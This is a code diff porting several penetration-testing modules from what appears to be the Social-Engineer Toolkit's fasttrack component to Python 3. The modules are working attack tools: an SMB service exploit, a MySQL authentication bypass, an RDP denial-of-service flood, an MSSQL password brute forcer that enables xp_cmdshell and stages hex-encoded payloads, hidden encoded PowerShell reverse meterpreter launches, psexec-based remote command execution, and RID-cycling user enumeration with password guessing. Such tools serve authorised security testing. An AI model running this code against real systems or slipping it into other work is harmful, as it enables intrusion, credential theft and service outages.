self.__stub += '\x01\x00\x00\x00'
return
def run(self):
try:
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
# 0x1f (or 31)- NetPathCanonicalize Operation
self.__dce.call(0x1f, self.__stub)
except:
print '[-] System appears not to be vulnerable. Sorry.'
print('[-] System appears not to be vulnerable. Sorry.')
try:
current = SRVSVC_Exploit(target, osver)
current.start()
except:
print '[-] Target does not appear vulnerable.'
print('[-] Target does not appear vulnerable.')
print "[!] If no errors were thrown. Try connecting to victim on 4444"
print("[!] If no errors were thrown. Try connecting to victim on 4444")

9
src/fasttrack/exploits/mysql_bypass.py
View file

@ -11,7 +11,7 @@
#
import subprocess
print """
print("""
This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
Title: MySQL Remote Root Authentication Bypass
@ -22,8 +22,9 @@ Original advisory here: seclists.org/oss-sec/2012/q2/493
Note, you will see a number of failed login attempts, after about 300, if it doesn't
work, then its not vulnerable.
"""
ipaddr = raw_input("Enter the IP address of the mysql server: ")
""")
ipaddr = input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" %
(ipaddr), shell=True).wait()

11
src/fasttrack/exploits/rdpdos.py
View file

@ -14,20 +14,21 @@
import socket
import sys
print "Microsoft Terminal Services / Remote Desktop Services - Denial of Service"
print("Microsoft Terminal Services / Remote Desktop Services - Denial of Service")
headpack = "030000130ee000000000000100080000000000".decode('hex')
dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex')
dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode(
'hex')
dafree = "0300000802f08028".decode('hex')
trololo = headpack+dafuq+dafree
trololo = headpack + dafuq + dafree
#HOSTNYO = sys.argv[1]
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO,PORTNYO))
s.connect((HOSTNYO, PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()

231
src/fasttrack/mssql.py
View file

@ -31,12 +31,14 @@ except ImportError:
sys.path.append(definepath)
else:
print "[!] Impacket is not installed. This menu will not work."
print("[!] Impacket is not installed. This menu will not work.")
sys.exit()
#
# this is the brute forcer
#
def brute(ipaddr,username,port,wordlist):
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
@ -48,17 +50,17 @@ def brute(ipaddr,username,port,wordlist):
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
password = open(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
ipaddr = str(ipaddr)
print "Attempting to brute force " + bcolors.BOLD + ipaddr + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC
print("Attempting to brute force " + bcolors.BOLD + ipaddr + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC)
# connect to the sql server and attempt a password
if ":" in ipaddr:
if ":" in ipaddr:
#target_server = _mssql.connect(ipaddr, username, passwords)
ipaddr = ipaddr.split(":")
port = ipaddr[1]
@ -70,15 +72,16 @@ def brute(ipaddr,username,port,wordlist):
sql_server.connect()
#target_server = False
target_server = sql_server.login("master", username, passwords)
if target_server:
print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
print_status("\nSuccessful login with username %s and password: %s" % (
username, passwords))
counter = 1
break
# if login failed or unavailable server
except Exception, e:
pass
except Exception as e:
pass
# if we brute forced a machine
if counter == 1:
@ -89,50 +92,60 @@ def brute(ipaddr,username,port,wordlist):
# else we didnt and we need to return a false
else:
if ipaddr != '':
print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr,username))
print_warning("Unable to guess the SQL password for %s with username of %s" % (
ipaddr, username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr,port,username,password):
def deploy_hex2binary(ipaddr, port, username, password):
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except: pass
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except:
pass
print_status("Checking if powershell is installed on the system...")
# just throw a simple command via powershell to get the output
mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'")
bundle = str(capture(mssql.printRows))
# remove null byte terminators from capture output
bundle = bundle.replace("\\x00", "")
# search for parameter version - standard output for powershell -Version command
# search for parameter version - standard output for powershell -Version
# command
match = re.search("parameter version", bundle)
# if we have a match we have powershell installed
if match:
print_status("Powershell was detected on the remote system.")
option_ps = raw_input("Do you want to use powershell injection? [yes/no]:")
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
print_status("Powershell delivery selected. Boom!")
else: option = "2"
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
print_status("Powershell not detected, attempting Windows debug method.")
print_status(
"Powershell not detected, attempting Windows debug method.")
option = "2"
# if we don't have powershell
if option == "2":
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
try:
reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
print_status("Connection established with SQL Server...")
print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus ~./set
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
@ -142,84 +155,105 @@ def deploy_hex2binary(ipaddr,port,username,password):
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
fileopen = file("%s/1msf.exe" % (web_path), "rb")
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
fileopen = open("%s/1msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file(setdir + "/payload.hex", "w")
filewrite = open(setdir + "/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
try:reload(pexpect)
except: import pexpect
try:
reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(),setdir))
child2 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
# random executable name
random_exe = generate_random_string(10,15)
random_exe = generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
print_status("Using universal powershell x86 process downgrade attack..")
print_status(
"Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
port = input(
setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
update_options("POWERSHELL_SOLO=ON")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = file(setdir + "/payload_options.shellcode", "w")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = open(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_tcp" + " " + port + ",")
filewrite.close()
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
try:
reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = file(setdir + "/x86.powershell", "r")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# if our payload is x86 based - need to prep msfconsole rc
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
# grab the metasploit path from config or smart detection
msf_path = meta_path()
if operating_system == "posix":
try: reload(pexpect)
except: import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path,setdir))
print_status("Waiting for the listener to start first before we continue forward...")
print_status("Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
try:
reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir))
print_status(
"Waiting for the listener to start first before we continue forward...")
print_status(
"Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
print_status(
"Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
@ -227,20 +261,22 @@ def deploy_hex2binary(ipaddr,port,username,password):
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
fileopen = open("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
print_status("Deploying initial debug stager to the system.")
random_file = generate_random_string(10,15)
random_file = generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
print_status("Deploying stager payload (hex): " + bcolors.BOLD + str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" % (line,random_file))
print_status("Deploying stager payload (hex): " +
bcolors.BOLD + str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" %
(line, random_file))
print_status("Converting the stager to a binary...")
# here we convert it to a binary
mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file))
@ -249,19 +285,26 @@ def deploy_hex2binary(ipaddr,port,username,password):
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
print_status("Sending the main payload via to be converted back to a binary.")
print_status(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file(setdir + "/payload.hex", "r")
fileopen = open(setdir + "/payload.hex", "r")
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query("exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
print_status("Delivery complete. Converting hex back to binary format.")
if data == "":
break
print_status("Deploying payload to victim machine (hex): " +
bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query(
"exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
print_status(
"Delivery complete. Converting hex back to binary format.")
mssql.sql_query("exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" % (random_file, random_exe))
mssql.sql_query(
"exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
print_status("Cleaning up old files..")
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe))
@ -269,11 +312,14 @@ def deploy_hex2binary(ipaddr,port,username,password):
# if we are using SET payload
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try: shutil.copyfile(setdir + "/web_clone/x", definepath)
except: pass
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
subprocess.Popen(
"python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
@ -283,24 +329,27 @@ def deploy_hex2binary(ipaddr,port,username,password):
else:
port = "443"
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
try: reload(thread)
except: import thread
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
reload(thread)
except:
import _thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
#mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
thread.start_new_thread(mssql.sql_query, (sql_command,))
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
#mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
_thread.start_new_thread(mssql.sql_query, (sql_command,))
# using the old method
if option == "2":
print_status("Triggering payload stager...")
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(mssql.sql_query, (sql_command,))
_thread.start_new_thread(mssql.sql_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
@ -311,14 +360,16 @@ def deploy_hex2binary(ipaddr,port,username,password):
child2.interact()
try:
os.remove("x")
except: pass
except: pass
except:
pass
except:
pass
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def cmdshell(ipaddr,port,username,password,option):
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
@ -326,19 +377,23 @@ def cmdshell(ipaddr,port,username,password,option):
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception, e: pass
print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception as e:
pass
print_status(
"Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while 1:
# prompt mssql
cmd = raw_input("mssql>")
cmd = input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit": break
if cmd == "quit" or cmd == "exit":
break
# if the command isnt empty
if cmd != "":
# execute the command
mssql.sql_query("exec master..xp_cmdshell '%s'" % (cmd))
# print the rest of the data
mssql.printReplies()
mssql.colMeta[0]['TypeData'] = 80*2
mssql.colMeta[0]['TypeData'] = 80 * 2
mssql.printRows()

66
src/fasttrack/psexec.py
View file

@ -1,6 +1,6 @@
#############################################
#
# Main SET module for psexec
# Main SET module for psexec
#
#############################################
from src.core.setcore import *
@ -17,24 +17,34 @@ from src.core.setcore import *
# SMBSHARE C$ yes The name of a writeable share on the server
# SMBUser no The username to authenticate as
# THREADS 1 yes The number of concurrent threads
# WINPATH WINDOWS yes The name of the remote Windows directory
# WINPATH WINDOWS yes The name of the
# remote Windows directory
# msf auxiliary(psexec_command) >
# grab config options for stage encoding
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off": stage_encoding = "false"
else: stage_encoding = "true"
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
rhosts=raw_input(setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
username=raw_input(setprompt(["32"], "Enter the username")) # username for domain/workgroup
password=raw_input(setprompt(["32"], "Enter the password or the hash")) # password for domain/workgroup
domain=raw_input(setprompt(["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads=raw_input(setprompt(["32"], "How many threads do you want [enter for default]"))
rhosts = input(setprompt(
["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
# username for domain/workgroup
username = input(setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(setprompt(["32"], "Enter the password or the hash"))
domain = input(setprompt(
["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads = input(
setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "": domain = "WORKGROUP"
if domain == "":
domain = "WORKGROUP"
# set the threads
if threads == "": threads = "15"
if threads == "":
threads = "15"
payload = check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
@ -47,39 +57,47 @@ try:
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
port = input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
filewrite = file(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write(payload + " " + port + ",")
filewrite.close()
update_options("POWERSHELL_SOLO=ON")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
try:
reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
os.makedirs(setdir + "/reports/powershell")
x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
payload = "windows/meterpreter/reverse_tcp\n" # if we are using x86
command = x86 # assign powershell to command
payload = "windows/meterpreter/reverse_tcp\n" # if we are using x86
command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" % (port,rhosts,username,password,domain,threads,command, stage_encoding))
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" %
(port, rhosts, username, password, domain, threads, command, stage_encoding))
filewrite.close()
# launch metasploit below
print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" % (meta_path(),setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" %
(meta_path(), setdir), shell=True).wait()
# handle exceptions
except Exception, e:
except Exception as e:
print_error("Something went wrong printing error: " + str(e))

168
src/fasttrack/rid_enum.py Executable file → Normal file
View file

@ -1,8 +1,8 @@
#!/usr/bin/env python
#!/usr/bin/python
import subprocess
import os
import sys
#############################################################################################################
##########################################################################
#
# RID Enum
# RID Cycling Tool
@ -17,11 +17,11 @@ import sys
#
# Special thanks to Tom Steele for the pull request update and changes.
#
#############################################################################################################
##########################################################################
def usage():
print """
print("""
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
@ -41,23 +41,25 @@ automatically attempt to brute force the user accounts when its finished enumera
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\USERNAME
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\\USERNAME
format.
Example: ./rid_enum.py 192.168.1.50 500 50000 /root/dict.txt
Example: ./ridenum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./rid_enum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
"""
Usage: ./ridenum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
""")
sys.exit()
# for nt-status-denied
denied = 0
# attempt to use lsa query first
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % ip, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if not "Domain Sid" in stdout_value:
@ -66,6 +68,8 @@ def check_user_lsa(ip):
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip, account), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
@ -80,7 +84,7 @@ def check_user(ip, account):
# helper function to break a list up into smaller lists
def chunk(l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
yield l[i:i + n]
# this will do a conversion to find the account name based on rid
@ -101,7 +105,7 @@ def sids_to_names(ip, sid, start, stop):
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if "NT_STATUS_ACCESS_DENIED" in stdout_value:
print "[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users."
print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.")
global denied
denied = 1
@ -112,9 +116,11 @@ def sids_to_names(ip, sid, start, stop):
rid_account = line.split(" ", 1)[1]
# will show during an unhandled request
# '00000' are bogus accounts?
# only return accounts ie. (1). Everything else should be a group
# only return accounts ie. (1). Everything else should be a
# group
if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account:
# here we join based on spaces, for example 'Domain Admins' needs to be joined
# here we join based on spaces, for example 'Domain
# Admins' needs to be joined
rid_account = rid_account.replace("(1)", "")
# return the full domain\username
rid_account = rid_account.rstrip()
@ -138,12 +144,12 @@ try:
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
if len(sys.argv) > 5:
userlist = sys.argv[5]
if not os.path.isfile(userlist):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
# check for python pexpect
@ -151,35 +157,38 @@ try:
import pexpect
# if we don't have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
print("[!] Sorry boss, python-pexpect is not installed. You need to install this first.")
sys.exit()
# if userlist is being used versus rid enum, then skip all of this
if not userlist:
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
# call the check_user_lsa function and check to see if we can find base SID guid
print("[*] Attempting lsaquery first...This will enumerate the base domain SID")
# call the check_user_lsa function and check to see if we can find base
# SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid:
print "[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip()
print "[*] Moving on to extract via RID cycling attack.. "
sid = sid.replace(
"WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print("[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip())
print("[*] Moving on to extract via RID cycling attack.. ")
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
else:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
print("[!] Unable to enumerate through lsaquery, trying default account names..")
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print "[!] Failed using account name: %s...Attempting another." % account
print("[!] Failed using account name: %s...Attempting another." % account)
else:
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
break
# if we found one
if sid != False:
@ -192,9 +201,9 @@ try:
# we has no sids :( exiting
if sid == False:
denied = 1
print "[!] Failed to enumerate SIDs, pushing on to another method."
print("[!] Failed to enumerate SIDs, pushing on to another method.")
print "[*] Enumerating user accounts.. This could take a little while."
print("[*] Enumerating user accounts.. This could take a little while.")
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
@ -203,26 +212,27 @@ try:
if os.path.isfile("%s_users.txt" % ip):
# remove old file
os.remove("%s_users.txt" % ip)
filewrite = file("%s_users.txt" % ip, "a")
filewrite = open("%s_users.txt" % ip, "a")
# cycle through rid and enumerate the domain
sid_names = sids_to_names(ip, sid, rid_start, rid_stop)
if sid_names:
for name in sid_names:
# print the sid
print "Account name: " + name
print("Account name: " + name)
# write the file out
filewrite.write(name + "\n")
# close the file
filewrite.close()
if denied == 0:
print "[*] RID_ENUM has finished enumerating user accounts..."
print("[*] RID_ENUM has finished enumerating user accounts...")
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print "[*] Attempting enumdomusers to enumerate users..."
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = file("%s_users.txt" % ip, "a")
print("[*] Attempting enumdomusers to enumerate users...")
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" %
(ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = open("%s_users.txt" % ip, "a")
counter = 0
for line in iter(proc.stdout.readline, ''):
counter = 1
@ -231,7 +241,7 @@ try:
# cycle through
line = line.split("rid:")
line = line[0].replace("user:[", "").replace("]", "")
print line
print(line)
filewrite.write(line + "\n")
else:
denied = 2
@ -245,32 +255,30 @@ try:
denied = 2
if denied == 2:
print "[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers."
print("[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers.")
if denied == 1:
filewrite.close()
print "[*] Finished dumping users, saved to %s_users.txt." % (ip)
print("[*] Finished dumping users, saved to %s_users.txt." % (ip))
# if we specified a password list
if passwords:
# our password file
passfile = file(passwords, "r").readlines()
